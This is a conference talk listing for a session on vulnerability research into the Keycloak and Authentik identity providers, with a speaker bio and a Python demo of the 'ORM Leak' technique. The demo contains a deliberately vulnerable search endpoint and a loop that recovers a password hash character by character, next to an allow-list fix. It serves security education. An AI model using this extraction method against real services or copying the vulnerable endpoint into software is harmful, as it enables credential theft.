Talk

Your Identity is Mine: Techniques and Insights from OS Identity Providers Research

March 14, 16:00 (CAMPUS)

Have you ever been excited to use a brand-new identity provider? Maybe an open-source one that offers a cost-effective and flexible solution? These systems can greatly enhance your organization's productivity. So far, so good, but what happens if an attacker compromises your identity provider?

In this session, we will outline our research process on two popular open-source IdPs, Keycloak and Authentik, and the 0-day bugs it uncovered (CVE-2024-42490, CVE-2024-37905).

We will dive into two new research techniques, ORM Leaks and web race conditions, and walk through their internals.
Then we will share the story of how an information leak prompted further investigation, leading to the discovery of the ORM Leak technique. Attendees will learn how to apply these techniques in their own research.
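To make the ORM Leak pattern concrete before the talk, here is an added illustration (example code written for this page, not Keycloak's or Authentik's code, and not the specific bugs above). A search endpoint forwards client-supplied Django-style lookups (`field__lookup=value`) straight into its query builder. All values are bound as SQL parameters, so this is not SQL injection; the leak comes from the client choosing the column and the lookup, which lets it filter on a column it is never allowed to read (`password`) and recover it one character at a time from the yes/no answer. The schema, the two user rows, the `search_users_*` endpoints and the hash alphabet are all constructed assumptions.

```python
"""ORM Leak pattern, as an added illustration (not Keycloak's or Authentik's code).

A search endpoint forwards client-supplied Django-style lookups
(`field__lookup=value`) straight into its query builder. Values are bound as
SQL parameters, so there is no SQL injection; the problem is that the client
chooses the *column* and the *lookup*, so it can filter on a column it is never
allowed to read (here `password`) and recover it from the yes/no answer.

Schema, rows, endpoint functions and alphabet below are constructed for this example.
"""
import sqlite3
import string

# Character set assumed for the stored hash; a real attacker would widen this.
ALPHABET = string.ascii_lowercase + string.digits + "$./"

# Columns an ORM would expose as filterable model fields (constructed schema).
COLUMNS = {"id", "username", "password", "is_admin"}


def make_db():
    """In-memory SQLite with two constructed user rows."""
    db = sqlite3.connect(":memory:")
    # Make LIKE case-sensitive so the prefix oracle answers exactly.
    db.execute("PRAGMA case_sensitive_like = ON")
    db.executescript(
        """
        CREATE TABLE users (
            id INTEGER PRIMARY KEY, username TEXT, password TEXT, is_admin INTEGER
        );
        INSERT INTO users VALUES (1, 'alice', 'pbkdf2$26000$abc123', 1);
        INSERT INTO users VALUES (2, 'bob',   'pbkdf2$26000$zzz999', 0);
        """
    )
    return db


def parse_lookup(key):
    """'password__startswith' -> ('password', 'startswith'); bare name -> exact."""
    col, sep, lookup = key.rpartition("__")
    return (col, lookup) if sep else (key, "exact")


def like_escape(value):
    """Escape LIKE metacharacters so user input is matched literally."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_users_vulnerable(db, params):
    """VULNERABLE: any model field combined with any supported lookup is accepted."""
    clauses, args = [], []
    for key, value in params.items():
        col, lookup = parse_lookup(key)
        if col not in COLUMNS:  # an ORM rejects unknown fields too; known ones pass
            raise ValueError(f"unknown field: {col}")
        if lookup == "exact":
            clauses.append(f'"{col}" = ?')
            args.append(value)
        elif lookup == "startswith":
            clauses.append(f'"{col}" LIKE ? ESCAPE \'\\\'')
            args.append(like_escape(value) + "%")
        else:
            raise ValueError(f"unsupported lookup: {lookup}")
    sql = "SELECT username FROM users"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    # Only usernames are returned, yet the WHERE clause already saw the password column.
    return [row[0] for row in db.execute(sql, args)]


# HARDENED: an explicit allow-list of (field, lookup) pairs the client may use.
ALLOWED_FILTERS = {("username", "exact"), ("username", "startswith")}


def search_users_hardened(db, params):
    """Same endpoint, but every filter key must be on the allow-list."""
    for key in params:
        if parse_lookup(key) not in ALLOWED_FILTERS:
            raise PermissionError(f"filter not allowed: {key}")
    return search_users_vulnerable(db, params)


def leak_password(search, username):
    """Recover a password hash one character at a time via the prefix oracle.

    `search` is the endpoint under attack: params -> list of matching usernames.
    Each round asks "does the hash start with known + ch?" and stops when no
    character in ALPHABET extends the known prefix.
    """
    known = ""
    while True:
        for ch in ALPHABET:
            if search({"username": username, "password__startswith": known + ch}):
                known += ch
                break
        else:
            return known


if __name__ == "__main__":
    db = make_db()
    print("leaked:", leak_password(lambda p: search_users_vulnerable(db, p), "alice"))
    try:
        leak_password(lambda p: search_users_hardened(db, p), "alice")
    except PermissionError as e:
        print("hardened endpoint:", e)
```

The fix is not input escaping (the values were already parameterized) but an allow-list of which fields and lookups a caller may filter on; in a real ORM the same check must also cover lookups that traverse relations into other models, since the leak works through any reachable field.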

Lastly, we will review a privilege escalation vulnerability in Authentik in which any user can gain full control of the system. From there, the sky is the limit (or at least control over your organization's assets and applications).

Speaker

Maor Abutbul

Maor Abutbul is a Vulnerability Researcher at CyberArk Labs with about 20 years of experience in the Network & Security fields.

He loves constantly evolving, playing CTFs and applying what he learns in his research.

Prior to joining CyberArk, Maor worked as a senior security researcher at CYMOTIVE Technologies where he led and conducted security research projects for various automotive vendors.

In addition, Maor possesses an engineering degree and a master's degree in communication systems engineering from Ben-Gurion University of the Negev.

You can reach him on LinkedIn
